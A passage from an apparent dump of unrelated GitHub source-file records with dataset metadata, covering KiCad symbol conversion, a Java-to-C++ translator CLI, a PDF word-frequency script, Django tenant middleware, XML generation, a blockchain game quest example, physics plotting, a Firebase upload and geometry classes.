ki_rectangle.pos_x1 = to_ki(int(ee_rectangle.width)) + ki_rectangle.pos_x0\n ki_rectangle.pos_y1 = -to_ki(int(ee_rectangle.height)) + ki_rectangle.pos_y0\n\n kicad_rectangles.append(ki_rectangle)\n\n return kicad_rectangles\n\n\ndef convert_ee_circles(\n ee_circles: List[EeSymbolCircle], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n):\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n return [\n KiSymbolCircle(\n pos_x=to_ki(int(ee_circle.center_x) - int(ee_bbox.x)),\n pos_y=-to_ki(int(ee_circle.center_y) - int(ee_bbox.y)),\n radius=to_ki(ee_circle.radius),\n background_filling=ee_circle.fill_color,\n )\n for ee_circle in ee_circles\n ]\n\n\ndef convert_ee_ellipses(\n ee_ellipses: List[EeSymbolEllipse],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolCircle]:\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n # Ellipses are not supported in Kicad -> If it's not a real ellipse, but just a circle\n return [\n KiSymbolCircle(\n pos_x=to_ki(int(ee_ellipses.center_x) - int(ee_bbox.x)),\n pos_y=-to_ki(int(ee_ellipses.center_y) - int(ee_bbox.y)),\n radius=to_ki(ee_ellipses.radius_x),\n )\n for ee_ellipses in ee_ellipses\n if ee_ellipses.radius_x == ee_ellipses.radius_y\n ]\n\n\ndef convert_ee_arcs(\n ee_arcs: List[EeSymbolArc], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n) -> List[KiSymbolArc]:\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n kicad_arcs = []\n for ee_arc in ee_arcs:\n if not (\n isinstance(ee_arc.path[0], SvgPathMoveTo)\n or isinstance(ee_arc.path[1], SvgPathEllipticalArc)\n ):\n logging.error(\"Can't convert this arc\")\n else:\n ki_arc = KiSymbolArc(\n radius=to_ki(\n max(ee_arc.path[1].radius_x, ee_arc.path[1].radius_y)\n ), # doesn't support elliptical arc\n angle_start=ee_arc.path[1].x_axis_rotation,\n start_x=to_ki(ee_arc.path[0].start_x - ee_bbox.x),\n start_y=to_ki(ee_arc.path[0].start_y - ee_bbox.y),\n end_x=to_ki(ee_arc.path[1].end_x - ee_bbox.x),\n end_y=to_ki(ee_arc.path[1].end_y - ee_bbox.y),\n )\n\n center_x, center_y, angle_end = compute_arc(\n start_x=ki_arc.start_x,\n start_y=ki_arc.start_y,\n radius_x=to_ki(ee_arc.path[1].radius_x),\n radius_y=to_ki(ee_arc.path[1].radius_y),\n angle=ki_arc.angle_start,\n large_arc_flag=ee_arc.path[1].flag_large_arc,\n sweep_flag=ee_arc.path[1].flag_sweep,\n end_x=ki_arc.end_x,\n end_y=ki_arc.end_y,\n )\n ki_arc.center_x = center_x\n ki_arc.center_y = center_y if ee_arc.path[1].flag_large_arc else -center_y\n ki_arc.angle_end = (\n (360 - angle_end) if ee_arc.path[1].flag_large_arc else angle_end\n )\n\n ki_arc.middle_x, ki_arc.middle_y = get_middle_arc_pos(\n center_x=ki_arc.center_x,\n center_y=ki_arc.center_y,\n radius=ki_arc.radius,\n angle_start=ki_arc.angle_start,\n angle_end=ki_arc.angle_end,\n )\n\n ki_arc.start_y = (\n ki_arc.start_y if ee_arc.path[1].flag_large_arc else -ki_arc.start_y\n )\n ki_arc.end_y = (\n ki_arc.end_y if ee_arc.path[1].flag_large_arc else -ki_arc.end_y\n )\n\n kicad_arcs.append(ki_arc)\n\n return kicad_arcs\n\n\ndef convert_ee_polylines(\n ee_polylines: List[Union[EeSymbolPolyline, EeSymbolPolygon]],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolPolygon]:\n\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n kicad_polygons = []\n for ee_polyline in ee_polylines:\n raw_pts = ee_polyline.points.split(\" \")\n # print(raw_pts)\n x_points = [\n to_ki(int(float(raw_pts[i])) - int(ee_bbox.x))\n for i in range(0, len(raw_pts), 2)\n ]\n y_points = [\n -to_ki(int(float(raw_pts[i])) - int(ee_bbox.y))\n for i in range(1, len(raw_pts), 2)\n ]\n\n if isinstance(ee_polyline, EeSymbolPolygon) or ee_polyline.fill_color:\n x_points.append(x_points[0])\n y_points.append(y_points[0])\n\n kicad_polygon = KiSymbolPolygon(\n points=[\n [x_points[i], y_points[i]]\n for i in range(min(len(x_points), len(y_points)))\n ],\n points_number=min(len(x_points), len(y_points)),\n is_closed=x_points[0] == x_points[-1] and y_points[0] == y_points[-1],\n )\n\n kicad_polygons.append(kicad_polygon)\n\n return kicad_polygons\n\n\ndef convert_ee_polygons(\n ee_polygons: List[EeSymbolPolygon],\n ee_bbox: EeSymbolBbox,\n kicad_version: KicadVersion,\n) -> List[KiSymbolPolygon]:\n return convert_ee_polylines(\n ee_polylines=ee_polygons, ee_bbox=ee_bbox, kicad_version=kicad_version\n )\n\n\ndef convert_ee_paths(\n ee_paths: List[EeSymbolPath], ee_bbox: EeSymbolBbox, kicad_version: KicadVersion\n) -> Tuple[List[KiSymbolPolygon], List[KiSymbolPolygon]]:\n kicad_polygons = []\n kicad_beziers = []\n to_ki: Callable = px_to_mil if kicad_version == KicadVersion.v5 else px_to_mm\n\n for ee_path in ee_paths:\n raw_pts = ee_path.paths.split(\" \")\n\n x_points = []\n y_points = []\n\n # Small svg path parser : doc -> https://www.w3.org/TR/SVG11/paths.html#PathElement\n\n for i in range(len(raw_pts)):\n if raw_pts[i] in [\"M\", \"L\"]:\n x_points.append(to_ki(int(float(raw_pts[i + 1])) - int(ee_bbox.x)))\n y_points.append(-to_ki(int(float(raw_pts[i + 2])) - int(ee_bbox.y)))\n i += 2\n elif raw_pts[i] == \"Z\":\n x_points.append(x_points[0])\n y_points.append(y_points[0])\n elif raw_pts[i] == \"C\":\n ...\n # TODO : Add bezier support\n\n # if ee_path.fill_color:\n # x_points.append(x_points[0])\n # y_points.append(y_points[0])\n\n ki_polygon = KiSymbolPolygon(\n points=[\n [x_points[i], y_points[i]]\n for i in range(min(len(x_points), len(y_points)))\n ],\n points_number=min(len(x_points), len(y_points)),\n is_closed=x_points[0] == x_points[-1] and y_points[0] == y_points[-1],\n )\n\n kicad_polygons.append(ki_polygon)\n\n return kicad_polygons, kicad_beziers\n\n\ndef convert_to_kicad(ee_symbol: EeSymbol, kicad_version: KicadVersion) -> KiSymbol:\n\n ki_info = KiSymbolInfo(\n name=ee_symbol.info.name,\n prefix=ee_symbol.info.prefix.replace(\"?\", \"\"),\n package=ee_symbol.info.package,\n manufacturer=ee_symbol.info.manufacturer,\n datasheet=ee_symbol.info.datasheet,\n lcsc_id=ee_symbol.info.lcsc_id,\n jlc_id=ee_symbol.info.jlc_id,\n )\n\n kicad_symbol = KiSymbol(\n info=ki_info,\n pins=convert_ee_pins(\n ee_pins=ee_symbol.pins, ee_bbox=ee_symbol.bbox, kicad_version=kicad_version\n ),\n rectangles=convert_ee_rectangles(\n ee_rectangles=ee_symbol.rectangles,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n ),\n circles=convert_ee_circles(\n ee_circles=ee_symbol.circles,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n ),\n arcs=convert_ee_arcs(\n ee_arcs=ee_symbol.arcs, ee_bbox=ee_symbol.bbox, kicad_version=kicad_version\n ),\n )\n kicad_symbol.circles += convert_ee_ellipses(\n ee_ellipses=ee_symbol.ellipses,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n )\n\n kicad_symbol.polygons, kicad_symbol.beziers = convert_ee_paths(\n ee_paths=ee_symbol.paths, ee_bbox=ee_symbol.bbox, kicad_version=kicad_version\n )\n kicad_symbol.polygons += convert_ee_polylines(\n ee_polylines=ee_symbol.polylines,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n )\n kicad_symbol.polygons += convert_ee_polygons(\n ee_polygons=ee_symbol.polygons,\n ee_bbox=ee_symbol.bbox,\n kicad_version=kicad_version,\n )\n\n return kicad_symbol\n\n\ndef tune_footprint_ref_path(ki_symbol: KiSymbol, footprint_lib_name: str):\n ki_symbol.info.package = f\"{footprint_lib_name}:{ki_symbol.info.package}\"\n\n\nclass ExporterSymbolKicad:\n def __init__(self, symbol, kicad_version: KicadVersion):\n self.input: EeSymbol = symbol\n self.version = kicad_version\n self.output = (\n convert_to_kicad(ee_symbol=self.input, kicad_version=kicad_version)\n if isinstance(self.input, EeSymbol)\n else logging.error(\"Unknown input symbol format\")\n )\n\n def export(self, footprint_lib_name: str) -> str:\n\n tune_footprint_ref_path(\n ki_symbol=self.output,\n footprint_lib_name=footprint_lib_name,\n )\n return self.output.export(kicad_version=self.version)\n","repo_name":"uPesy/easyeda2kicad.py","sub_path":"easyeda2kicad/kicad/export_kicad_symbol.py","file_name":"export_kicad_symbol.py","file_ext":"py","file_size_in_byte":12792,"program_lang":"python","lang":"en","doc_type":"code","stars":402,"dataset":"github-code","pt":"53"} +{"seq_id":"7490887322","text":"import argparse\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom translator import Translator\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Java to C++ Translator')\n parser.add_argument('file', metavar='file', type=str, help='path to java source code file')\n parser.add_argument('--cpp', default='a.cpp', type=str, help='path to output c++ code file')\n parser.add_argument('--force', help='force writing to existing file', action='store_true')\n parser.add_argument('--debug', help='debug', action='store_true')\n parser.add_argument('--compile', help='compile code with g++ compiler', action='store_true')\n parser.add_argument('--compilepath', default='a.exe', type=str, help='path to compiled c++ code file')\n\n args = parser.parse_args()\n java_file_name = args.file\n cpp_file_name = args.cpp\n force = args.force\n debug = args.debug\n compiled_file_name = args.compilepath\n compile = args.compile or (args.compilepath is not None)\n\n if not os.path.isfile(java_file_name):\n raise Exception(f'Cannot find file by that path: {java_file_name}.')\n if (not force) and (os.path.isdir(cpp_file_name) or os.path.isfile(cpp_file_name)):\n raise Exception(f'There is a file/directory by that path provided in --cpp: {cpp_file_name}. '\n 'Please select another path.')\n if compile and ((not force) and (os.path.isdir(compiled_file_name) or os.path.isfile(compiled_file_name))):\n raise Exception(f'There is a file/directory by that path provided in --compilepath: {compiled_file_name}. '\n 'Please select another path.')\n\n # DEBUG\n # folder = 'tests\\\\correct_tests\\\\function'\n # java_file_name = os.path.join(folder, 'Main.java')\n # cpp_file_name = os.path.join(folder, 'main.cpp')\n # compiled_file_name = os.path.join(folder, 'main.exe')\n\n with open(java_file_name, 'r') as java_file:\n with open(cpp_file_name, 'w') as cpp_file:\n translator = Translator(os.path.dirname(Path(java_file_name)), debug)\n cpp_source_code = translator.run(java_file.read())\n cpp_file.write(str(cpp_source_code))\n print(f'Success. Output saved to {cpp_file_name}.')\n\n if compile:\n command_to_compile = f'g++ {cpp_file_name} -o {compiled_file_name}'\n sp = subprocess.run(command_to_compile, shell=False)\n if sp.returncode == 0:\n print(f'Success. Binary saved to {compiled_file_name}.')\n else:\n raise Exception(f'g++ return code {sp.returncode}. ')\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n # print(e, file=sys.stderr)\n raise\n\n","repo_name":"ephemeralsadness/translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73261928809","text":"from collections import Counter\r\nfrom tika import parser\r\nimport pandas as pd\r\n\r\nexcluir = ['de','o','por','não','um','a','para','isso','é','mais','foram','vem','como',\r\n 'na','que','no','e','os','as','com','do','da','das','dos','uma','em','entanto','aumenta',\r\n 'maior','entre','ainda','já','temos','maio','são','Administração', 'BNY', 'Mellon', 'Serviços', 'Financeiros', 'DTVM', 'S/A',\r\n 'CNPJ:', '02.201.501/0001-61', 'Av.', 'Presidente', 'Wilson,', '231,', '11º', 'andar', 'Rio', 'de', 'Janeiro', '–', 'RJ', 'CEP:',\r\n '20030-905', 'Telefone', '(21)', '3219-2500', 'Fax', '(21)', '3219-2508', 'www.bnymellon.com.br/sf', 'SAC:', 'Fale', 'conosco', 'no', 'endereço',\r\n 'www.bnymellon.com.br/sf', 'ou', 'no', 'telefone', '0800', '7253219', 'Ouvidoria', 'no', 'endereço',\r\n 'www.bnymellon.com.br/sf', 'ou', 'no', 'telefone:', '0800', '7253219', 'Este', 'material', 'é', 'meramente',\r\n 'informativo', 'e', 'não', 'considera', 'os', 'objetivos', 'de', 'investimento,', 'a', 'situ-', 'ação', 'financeira',\r\n 'ou', 'as', 'necessidades', 'individuais', 'de', 'um', 'ou', 'de', 'determinado', 'grupo', 'de', 'investidores.',\r\n 'Recomendamos', 'a', 'consulta', 'de', 'profissionais', 'espe-', 'cializados', 'para', 'decisão', 'de', 'investimentos.',\r\n 'Fundos', 'de', 'Investimento', 'não', 'contam', 'com', 'a', 'Garantia','/','caps', 'do', 'Administrador,', 'do', 'Gestor,', 'de',\r\n 'qualquer','bahia', 'mecanis-', 'mo', 'de', 'seguro,', 'ou,', 'ainda,', 'do', 'Fundo', 'Garantidor', 'de', 'Crédito', '–', 'FGC.',\r\n 'Rentabilidade', 'obtida','20','am', 'no', 'passado', '2020','não', 'representa', 'garantia', 'de', 'rentabilidade', 'futura.', 'Ao', 'investidor',\r\n 'é', 'recomendada', 'a', 'leitura', 'cuidado-', 'sa', 'do', 'prospecto', 'ou', 'do', 'regulamento', 'do', 'Fundo', 'de', 'Investimento',\r\n 'antes', 'de', 'aplicar','fic','am', 'seus', 'recursos.', 'As', 'rentabilidade', 'divulgadas', 'são', 'líquidas', 'de', 'taxa', 'de', 'administração',\r\n 'e', 'performance', 'e', 'bruta', 'de', 'impos-', 'tos.', 'As', 'informações', 'e', 'conclusões', 'contidas', 'neste', 'material', 'podem',\r\n 'ser', 'alteradas', 'a', 'qualquer', 'tempo,', 'sem', 'que', 'seja', 'necessária', 'prévia', 'comunicação.', 'Este', 'material', 'não', 'pode',\r\n 'ser', 'copiado,', 'reproduzi-', 'do', 'ou', 'distribuído', 'sem', 'a', 'prévia', 'e', 'expressa', 'con-', 'cordância', 'da', 'JGP.', 'Para', 'maiores', 'informações,',\r\n 'consulte', 'nossa', 'área', 'comercial.', 'Gestão', 'e', 'Distribuição', 'JGP', 'Gestão', 'de', 'Recursos', 'Ltda.', 'e', 'JGP', 'Gestão',\r\n 'de', 'Crédito', 'Ltda.', 'Rua', 'Humaitá', '275,', '11º', 'andar', 'Humaitá,', 'Rio', 'de', 'Janeiro', '-', 'RJ', 'CEP:', '22261-005',\r\n 'Brasil', 'www.jgp.com.br', 'https://www.jgp.com.br/?utm_source=report&utm_medium=pdf&utm_campaign=relatorio_gestao&utm_content=abr21', 'Relatório',\r\n 'de', 'Gestão:', 'Carta', 'Macroeconômica', '—', 'Junho', '2021', '1', 'Relatório', 'de', 'Gestão', 'Carta', 'Macroeconômica',\r\n 'Junho', '2021', 'Material', 'de', 'Divulgação', 'https://www.instagram.com/jgp.asset', 'https://www.linkedin.com/company/jgp',\r\n 'http://youtube.co/jgpgestao', 'Relatório', 'de', 'Gestão:', 'Carta', 'Macroeconômica', '—', 'Junho', '2021', '2', 'Process',\r\n 'finished','foi','janeiro', 'br/sf','with','nível','mas','gestão','está','junho','julho', 'exit','março','tudo','essa','tem','bnymellon',\r\n '|','essa','este','onde', 'code','pois','gestão:', '0','sobre','se','relatório','https://www','muito','ano','carta','fevereiro','www','abril','nos','também','ao','jgp',\r\n 'de', 'a', 'o', 'que', 'e', 'do', 'da', 'em', 'um', 'para', 'é', 'com', 'não', 'uma', 'os', 'no', 'se', 'na', 'por', 'mais', 'as', 'dos', 'como', 'mas', 'foi', 'ao',\r\n 'ele', 'das', 'tem', 'à', 'seu', 'sua', 'ou', 'ser', 'quando', 'muito', 'há', 'nos', 'já', 'está', 'eu', 'também', 'só', 'pelo', 'pela', 'até', 'isso', 'ela', 'entre',\r\n 'era', 'depois', 'sem', 'mesmo', 'aos', 'ter', 'seus', 'quem', 'nas', 'me', 'esse', 'eles', 'estão', 'você', 'tinha', 'foram', 'essa', 'num', 'nem', 'suas', 'meu', 'às',\r\n 'minha', 'têm', 'numa', 'pelos', 'elas', 'havia', 'seja', 'qual', 'será', 'nós', 'tenho', 'lhe', 'deles', 'essas', 'esses', 'pelas', 'este', 'fosse', 'dele', 'tu', 'te',\r\n 'vocês', 'vos', 'lhes', 'meus', 'minhas', 'teu', 'tua', 'teus', 'tuas', 'nosso', 'nossa', 'nossos', 'nossas', 'dela', 'delas', 'esta', 'estes', 'estas', 'aquele', 'aquela',\r\n 'aqueles', 'aquelas', 'isto', 'aquilo', 'estou', 'está', 'estamos', 'estão', 'estive', 'esteve', 'estivemos', 'estiveram', 'estava', 'estávamos', 'estavam', 'estivera',\r\n 'estivéramos', 'esteja', 'estejamos', 'estejam', 'estivesse', 'estivéssemos', 'estivessem', 'estiver', 'estivermos', 'estiverem', 'hei', 'há', 'havemos', 'hão',\r\n 'houve', 'houvemos', 'houveram', 'houvera', 'houvéramos', 'haja', 'hajamos', 'hajam', 'houvesse', 'houvéssemos', 'houvessem', 'houver', 'houvermos', 'houverem',\r\n 'houverei', 'houverá', 'houveremos', 'houverão', 'houveria', 'houveríamos', 'houveriam', 'sou', 'somos', 'são', 'era', 'éramos', 'eram', 'fui', 'foi', 'fomos',\r\n 'foram', 'fora', 'fôramos', 'seja', 'sejamos', 'sejam', 'fosse', 'fôssemos', 'fossem', 'for', 'formos', 'forem', 'serei', 'será', 'seremos', 'serão', 'seria',\r\n 'seríamos', 'seriam', 'tenho', 'tem', 'temos', 'tém', 'tinha', 'tínhamos', 'tinham', 'tive', 'teve', 'tivemos', 'tiveram', 'tivera', 'tivéramos', 'tenha', 'tenhamos',\r\n 'tenham', 'sendo','novos','fim','novos','meses','fundos','02%','07%','r','início','ab','alguns','21','long','quanto','tivesse','3','data','fundo','25%','9','8','7','6','5','4','2','1', 'tivéssemos','fi', 'tivessem','ativos','novas', 'tiver', 'mês','tivermos', 'pl','tiverem','fia', 'terei', 'terá', 'teremos', 'terão', 'teria', 'teríamos', 'teriam']\r\n\r\n\r\n\r\njgp = 'C:\\\\Users\\\\André Greboge\\\\PycharmProjects\\\\SuperRankFIDCS\\\\carta\\\\'\r\n\r\ngestores = []\r\n\r\n\r\nfor gestor in gestores:\r\n cols = ['','','','','','','','','','']\r\n comum = []\r\n pdfs = ['0121','0221','0321','0421','0521','0621','0721']\r\n for pdf in pdfs:\r\n # comum = []\r\n pdf_ler = parser.from_file(gestor + pdf + '.pdf')\r\n pdf_lido = pdf_ler['content']\r\n for char in '-.,\\n':\r\n pdf_lido=pdf_lido.replace(char,' ')\r\n pdf_lido = pdf_lido.lower()\r\n lista_palavras_desordenada = [s.lower() for s in pdf_lido.split() if s.lower() not in excluir]\r\n mais_comum = Counter(lista_palavras_desordenada).most_common(10)\r\n comum.append(mais_comum)\r\n tabela = pd.DataFrame(comum, columns=cols)\r\n print(comum)\r\n tabela.to_excel('tabela.xlsx')\r\n\r\n\r\n\r\n","repo_name":"andreluizgreboge/carta_gestor","sub_path":"CartaGestor.py","file_name":"CartaGestor.py","file_ext":"py","file_size_in_byte":7054,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17711077052","text":"\nfrom apps.shared_apps.customers.models import Client, Domain\nfrom channels.db import database_sync_to_async\nfrom django.conf import settings\nfrom django.db import connection\nfrom django.urls import set_urlconf\n\n\nclass AsyncTenantMainMiddleware:\n \"\"\"\n This middleware should be placed at the very top of the middleware stack.\n Selects the proper database schema using the request host. Can fail in\n various ways which is better than corrupting or revealing data.\n \"\"\"\n\n def __init__(self, app):\n # Store the ASGI application we were passed\n self.app = app\n \n @database_sync_to_async\n def get_tenant(self, domain_model, hostname):\n domain = domain_model.objects.select_related('tenant').get(domain=hostname)\n return domain.tenant\n\n async def __call__(self, scope, receive, send):\n connection.set_schema_to_public()\n\n try:\n hostname = await self.hostname_from_request(scope)\n except Exception:\n from django.http import HttpResponseNotFound\n return HttpResponseNotFound()\n \n domain_model = Domain\n\n try:\n tenant = await self.get_tenant(domain_model, hostname)\n \n except domain_model.DoesNotExist:\n raise Exception(f\"No tenant for hostname {hostname}\")\n except Exception:\n raise Exception(f\"No tenant for hostname {hostname}\")\n \n tenant.domain_url = hostname\n scope['tenant'] = tenant\n connection.set_tenant(tenant)\n\n return await self.app(scope, receive, send)\n\n async def hostname_from_request(self, scope):\n headers_dict = scope\n headers = dict(headers_dict['headers'])\n host = headers.get(b'host', b'').decode().split(':')[0]\n return host\n","repo_name":"Ngahu/dj_channels_x_dj_tenants","sub_path":"dj_channels_x_dj_tenants/middleware/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23374853223","text":"import xml.etree.cElementTree as ET\nfrom datetime import datetime, timedelta\nimport random\n\n\n# \"%Y-%m-%dT%H:%M:%S.0%fZ\"\nt = timedelta(minutes=60)\ndate_only = datetime.now().date()\ndate_only.strftime(\"%Y-%m-%d\")\ntime_only = datetime.now().time()\ntime_only.strftime(\"H:%M:%S.0%fZ\")\nutc_time = str(date_only)+'T'+str(time_only) + 'Z'\ndate_list = []\ndate_list.append(utc_time)\n\nfor i in range(300):\n\n time_obj = datetime.strptime(date_list[-1], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n time = time_obj + t\n time_date_only = time.date()\n time_date_only.strftime(\"%Y-%m-%d\")\n time_time_only = time.time()\n time_time_only.strftime(\"H:%M:%S.0%fZ\")\n final_time = str(time_date_only)+'T'+str(time_time_only) + 'Z'\n date_list.append(final_time)\n # print(type(final_time))\n\n root = ET.Element(\"ALPINE_MEASUREMENT\")\n site = ET.Element(\"Site\", name=\"ALPINE_KASTORIA\")\n node = ET.Element(\"NODE\", address=\"0013A20040A56FE9\")\n register = ET.Element(\"REGISTER\")\n\n site = ET.SubElement(root, \"SITE\", name=\"ALPINE_KASTORIA\")\n node = ET.SubElement(site, \"NODE\", address=\"0013A20040A56FE9\")\n register = ET.SubElement(node, \"REGISTER\")\n id = ET.SubElement(register, \"ID\", reg=\"10\")\n\n ET.SubElement(id, \"TYPE\").text = \"Distance_Sensor\"\n ET.SubElement(id, \"UNIT\").text = \"CM\"\n ET.SubElement(id, \"NAME\").text = \"Alpine_K81_Height\"\n ET.SubElement(id, \"VALUE\").text = str(random.uniform(100, 350))\n ET.SubElement(id, \"VARIABLETYPE\").text = \"xs:double\"\n ET.SubElement(id, \"TIME\").text = final_time\n\n tree = ET.ElementTree(root)\n tree.write(\"filename %s.xml\" % i)\n","repo_name":"theokont/Data-Visualization-App","sub_path":"random_xmls/xml_gen.py","file_name":"xml_gen.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36225308713","text":"import logging\nimport sys\nimport quests.wishing_well as wishing_well\n\nif __name__ == \"__main__\":\n log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'\n\n logger = logging.getLogger(\"DFK-wishing well quest\")\n logger.setLevel(logging.DEBUG)\n logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)\n\n rpc_server = 'https://api.harmony.one'\n logger.info(\"Using RPC server \" + rpc_server)\n\n level = wishing_well.quest_level(rpc_server)\n logger.info(\"Quest level \"+str(level))\n\n hero_id = 1 # \n stamina = wishing_well.get_current_stamina(hero_id, rpc_server)\n logger.info(\"Current stamina on hero \" + str(hero_id) + \": \" + str(stamina))\n\n #w3 = Web3(Web3.HTTPProvider(rpc_server))\n #gas_price_gwei = 10\n #private_key = # set private key\n #account_address = w3.eth.account.from_key(private_key).address\n #wishing_well.start_quest(hero_id, 5, private_key, w3.eth.get_transaction_count(account_address), gas_price_gwei, 30, rpc_server, logger)\n #time.sleep(60)\n #tx_receipt = wishing_well.complete_quest(hero_id, private_key, w3.eth.get_transaction_count(account_address), gas_price_gwei, 30, rpc_server, logger)\n\n #quest_result = wishing_well.parse_complete_quest_receipt(tx_receipt, rpc_server)\n #logger.info(\"Quest earned \" + str(quest_result['tear']) + \" tears and \" + str(quest_result['xp']) + \" xp\")\n\n\n\n","repo_name":"0rtis/dfktools","sub_path":"src/dfktools/wishing_well_quest_example.py","file_name":"wishing_well_quest_example.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"35227337543","text":"from cascade.utils import SterileParams, gen_filename, config, bhist\nfrom cascade.cross_section_test import get_total_flux as get_xs\nfrom cascade.nus_utils import get_flavor, get_neut, get_curr\n\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\n\nimport pickle\n\nfrom math import pi\n\ndef _load_flux(name):\n f = open(name,'rb')\n all_data = pickle.load(f)\n f.close()\n\n e_reco = all_data[\"e_true\"]\n a_reco = all_data[\"a_true\"]\n flux = all_data[\"flux\"]\n\n return(e_reco, a_reco, flux)\n\ne_reco, a_reco, flux = _load_flux(gen_filename(config[\"datapath\"], config[\"nu_flux_downsize\"]+\".dat\", SterileParams()))\n\nenergies = bhist([e_reco]).centers\na_widths = bhist([a_reco]).widths\nangles = bhist([a_reco]).centers\n\nkeys = list(flux.keys())\n\n\ndef is_track(key):\n\n curr = key.split(\"_\")[2].lower()\n if \"nc\"==curr:\n return(False)\n elif \"cc\"==curr:\n flavor = key.split(\"_\")[0].lower()\n if flavor==\"mu\":\n return(True)\n elif flavor==\"e\":\n return(False)\n elif flavor==\"tau\":\n return(False)\n else:\n raise ValueError(\"Not sure what to do with {}\".format(flavor))\n\n else:\n raise ValueError(\"Not sure what {} is\".format(curr))\n \ncascade_rate = np.zeros(shape=np.shape(flux[keys[0]])[0])\ntrack_rate = np.zeros(shape=np.shape(flux[keys[0]])[0])\n\n\neff_width = (max(a_reco)-min(a_reco))/(2*len(a_reco))\nwidths_rad = [abs(np.arccos(ang+eff_width)-np.arccos(ang-eff_width)) for ang in np.linspace(min(a_reco), max(a_reco),len(a_reco))]\n\nsterr = widths_rad*np.sin(np.arccos(a_reco))*2*pi\n\nfor key in keys:\n flav = get_flavor(key)\n neut = get_neut(key)\n curr = get_curr(key)\n\n for i_energy in range(len(energies)):\n xs = get_xs(energies[i_energy], flav, neut, curr)\n amount = sum(flux[key][i_energy]*sterr*xs)\n\n if is_track(key):\n track_rate[i_energy] += amount\n else:\n cascade_rate[i_energy] += amount\n\nfor i_energy in range(len(energies)):\n flav = get_flavor(\"Mu_nu_CC\")\n curr = get_curr(\"Mu_nu_CC\")\n\n neut_nu = get_neut(\"Mu_nu_CC\")\n neut_nubar = get_neut(\"Mu_nuBar_CC\")\n\n xs_nu = get_xs(energies[i_energy], flav, neut_nu, curr)\n xs_nubar = get_xs(energies[i_energy], flav, neut_nubar, curr)\n\n amount_nu = sum(flux[\"Mu_nu_NC\"][i_energy]*sterr*xs_nu)\n amount_nubar=sum(flux[\"Mu_nuBar_NC\"][i_energy]*sterr*xs_nubar)\n\n track_rate[i_energy]+= amount_nu+amount_nubar\n\nvolume = (1e3)**3\nnucleon_density = 0.9168*pow(100,3)*(6.02e23)\n\nplt.plot(e_reco/(1e9), track_rate*volume*nucleon_density, label=\"Track Rate\")\nplt.plot(e_reco/(1e9), cascade_rate*volume*nucleon_density, label=\"Cascade Rate\")\nplt.xscale('log')\nplt.xlabel(\"Energy [GeV]\", size=16)\nplt.ylabel(r\"Event Rate [GeV s]$^{-1}$\",size=16)\nplt.yscale('log')\nplt.xlim([10**2, 10**6])\nplt.legend()\nplt.tight_layout()\nplt.show()\n","repo_name":"BenSmithers/Cascade-Smearing","sub_path":"plotting/improve_cascade.py","file_name":"improve_cascade.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25270786685","text":"from firebase_admin import credentials, initialize_app, storage\nimport os\n\n\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\n# Init firebase with your credentials\n\ncred = credentials.Certificate(os.path.join(current_dir, \"secret.json\"))\ninitialize_app(cred, {'storageBucket': 'bucket-url'})\n\n# Put your local file path \n\nfileName = os.path.join(current_dir, \"image.jpeg\")\nbucket = storage.bucket()\nblob = bucket.blob(fileName)\nblob.upload_from_filename(fileName)\n\n# Opt : if you want to make public access from the URL\n\nblob.make_public()\n\nprint(\"your file url\", blob.public_url)\n\n","repo_name":"MuokaPWambua/fire-storage","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70340858410","text":"import math\n\nclass Figure:\n def __init__(self, length, width):\n self.length = length\n self.width = width\n def area(self): #Nesupratau salygos, atrode, kad reikia metodu visose klasese, net 'parent'\n area = self.width * self.length\n return f'Your figure area is: {area}'\n\n def perimeter(self): #Nesupratau salygos, atrode, kad reikia metodu visose klasese, net 'parent'\n perimeter = (self.width + self.length) * 2\n return f'Your figure perimeter is {perimeter}'\nclass Rectangle(Figure):\n\n def calculate_area(self):\n area = self.width * self.length\n return f'Your Rectangle area is: {area}'\n def calculate_perimeter(self):\n perimeter = (self.width + self.length) * 2\n return f'Your Rectangle perimeter is {perimeter}'\nclass RightTriangle(Figure):\n\n def calculate_s(self):\n s = int(self.width * self.length / 2)\n return f'Your Triangle area is {s}'\n\n def calculate_p(self):\n c = math.sqrt(self.length **2 + self.width **2)\n p = int(self.length + 